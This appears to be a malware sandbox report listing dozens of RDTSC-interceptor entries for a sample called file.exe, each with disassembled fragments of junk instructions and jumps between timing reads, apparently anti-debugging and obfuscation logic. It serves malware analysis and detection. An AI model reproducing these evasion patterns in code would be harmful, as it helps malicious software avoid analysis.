                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159D8 second address: 13159EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FF6744C8C9Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159EF second address: 1315A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3663h], eax 0x00000010 mov dword ptr [ebp+122D1847h], edi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov ebx, dword ptr [ebp+122D369Eh] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF674E409B8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov eax, dword ptr [ebp+122D16F5h] 0x0000004a push FFFFFFFFh 0x0000004c add dword ptr [ebp+122D2E88h], esi 0x00000052 nop 0x00000053 pushad 0x00000054 jnl 00007FF674E409BCh 0x0000005a pushad 0x0000005b jnc 00007FF674E409B6h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131A54E second address: 131A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8C9Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131A626 second address: 131A62C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131A62C second address: 131A631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131B706 second address: 131B70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131B8EE second address: 131B8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131C7DA second address: 131C7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131E5C3 second address: 131E5ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF6744C8CA2h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131C7E0 second address: 131C805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131E5ED second address: 131E5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131C805 second address: 131C80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131E5F3 second address: 131E5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7D5E second address: 12C7D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7D64 second address: 12C7D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324F0B second address: 1324F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324F17 second address: 1324F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF6744C8C96h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324F22 second address: 1324F35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FF674E409B6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324F35 second address: 1324F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FF6744C8CA4h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324654 second address: 1324691 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF674E409BEh 0x00000008 jmp 00007FF674E409C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FF674E409C2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324AAF second address: 1324ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Ch 0x00000007 jmp 00007FF6744C8CA5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324ADC second address: 1324AF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF674E409BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF674E409B6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1324AF2 second address: 1324AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132FCAA second address: 132FCBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 je 00007FF674E409B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330268 second address: 133026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133026D second address: 1330273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330273 second address: 1330277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13307B5 second address: 13307BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13307BD second address: 13307C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C2C74 second address: 12C2CCF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF674E409B6h 0x00000008 jno 00007FF674E409B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jc 00007FF674E409B6h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007FF674E409CCh 0x00000020 pushad 0x00000021 jmp 00007FF674E409C2h 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007FF674E409BEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330ABC second address: 1330AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330AC0 second address: 1330AD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409C3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330AD9 second address: 1330B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF6744C8C96h 0x00000009 jmp 00007FF6744C8CA0h 0x0000000e popad 0x0000000f pushad 0x00000010 jp 00007FF6744C8C96h 0x00000016 jns 00007FF6744C8C96h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330C62 second address: 1330C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133254F second address: 1332558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13387DB second address: 13387E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13387E4 second address: 13387EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13387EA second address: 13387F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF674E409B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133778A second address: 133778F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13378C3 second address: 13378F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF674E409C7h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF674E409C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13378F9 second address: 1337907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337907 second address: 1337912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF674E409B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BA8 second address: 1337BAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1337BAE second address: 1337BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF674E409C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1338190 second address: 1338194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133DC70 second address: 133DCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF674E409B6h 0x0000000a jmp 00007FF674E409C9h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jmp 00007FF674E409C6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FFF44 second address: 12FFF9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub edx, dword ptr [ebp+122D37ECh] 0x00000010 mov ecx, esi 0x00000012 lea eax, dword ptr [ebp+12471C90h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FF6744C8C98h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov edx, dword ptr [ebp+122D391Ch] 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b je 00007FF6744C8C98h 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FFF9C second address: 12E6FE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF674E409C6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF674E409BCh 0x00000011 nop 0x00000012 mov dh, C4h 0x00000014 call dword ptr [ebp+122DB7C2h] 0x0000001a push edx 0x0000001b jne 00007FF674E409D9h 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130060C second address: 1300612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13006CF second address: 13006EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF674E409C4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1300946 second address: 130094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130094A second address: 130094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130094E second address: 1300954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1300954 second address: 1300959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301270 second address: 12E7AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF6744C8C98h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jnl 00007FF6744C8C9Bh 0x00000029 and dx, 3AE7h 0x0000002e call dword ptr [ebp+122DB81Dh] 0x00000034 jng 00007FF6744C8CB9h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E7AEB second address: 12E7AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D2BE second address: 133D2E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FF6744C8C9Bh 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007FF6744C8C96h 0x0000001c popad 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D424 second address: 133D42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D42A second address: 133D430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D430 second address: 133D434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D5DB second address: 133D5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D5E1 second address: 133D5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF674E409B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D5F1 second address: 133D5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF6744C8C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D5FD second address: 133D605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133D74D second address: 133D752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1342038 second address: 1342047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 jo 00007FF674E409B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1342823 second address: 134283E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134283E second address: 1342860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409C2h 0x0000000b popad 0x0000000c push esi 0x0000000d jo 00007FF674E409BEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13429CF second address: 13429E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007FF6744C8C96h 0x0000000d pop edi 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1342B36 second address: 1342B73 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF674E409CFh 0x0000000c jmp 00007FF674E409C9h 0x00000011 popad 0x00000012 push esi 0x00000013 jmp 00007FF674E409C1h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134AFF6 second address: 134AFFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134E14F second address: 134E157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134E157 second address: 134E15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134E15B second address: 134E169 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134D9BA second address: 134D9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jp 00007FF6744C8C9Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134D9C9 second address: 134D9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134D9CF second address: 134D9F6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6744C8C98h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF6744C8CA9h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1352417 second address: 135243E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF674E409B6h 0x00000008 jmp 00007FF674E409BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF674E409C1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1356E6F second address: 1356E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135713C second address: 1357155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13572E2 second address: 13572FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF6744C8CA1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13572FB second address: 1357315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135746C second address: 1357476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF6744C8C96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1357476 second address: 135747C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135747C second address: 135749A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF6744C8C9Ch 0x00000010 jc 00007FF6744C8C96h 0x00000016 push eax 0x00000017 jns 00007FF6744C8C96h 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135AB49 second address: 135AB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jno 00007FF674E409B6h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF674E409BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135ACC9 second address: 135ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B0A0 second address: 135B0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FF674E409B6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B0AF second address: 135B0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B0B5 second address: 135B0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF674E409B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B0BF second address: 135B0D5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FF6744C8CA7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B0D5 second address: 135B0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF674E409BBh 0x00000009 rdtsc
